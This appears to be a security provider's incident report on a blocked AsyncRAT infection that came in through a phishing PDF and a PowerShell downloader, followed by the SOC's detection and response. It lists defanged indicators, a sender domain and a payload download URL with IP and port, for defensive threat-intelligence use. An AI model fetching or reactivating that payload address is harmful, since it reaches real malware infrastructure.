In March, the Cerium SOC team detected and prevented a multi-stage ASync RAT infection. The attack originated from a malicious PDF file attached to an email from “no-reply@ctn-slngs[.]com”. The victim clicked on a link embedded in the PDF file, which triggered a PowerShell script. The script reached out to “hxxp://45[.]154[.]98[.]24:222/q[.]jpg”, a self-extracting, compressed file hidden as a picture.
After some extensive investigation into the source and performing forensic analysis on the malicious attachment, the SOC discovered the URL and binary is associated with Async RAT, a type of Remote Access Trojan (RAT) that uses secure encrypted connections to remotely control and check computers. Alongside these capabilities, it also incorporates features such as keylogging and remote desktop control, posing potential harm to the victim’s system. Delivery methods for this RAT include spear phishing, malvertising, and exploit kits.
The attacker obfuscated the malicious link and loader in a way that bypassed the client’s email security. Thankfully, our client’s endpoint security stopped the PowerShell Script from calling the download of the ASync payload and alerted the SIEM. Within less than an hour, Cerium SOC responded to the alert, analyzed the email and attachment for added threat intelligence, and escalated the incident to the client.
Our client quickly isolated the user and device, and eradicated malicious email from the rest of the mail server. They also blacklisted the attacker email and payload address. More investigations concluded that the SOC team successfully stopped the attack before infection occurred, and no client data was compromised in the incident.
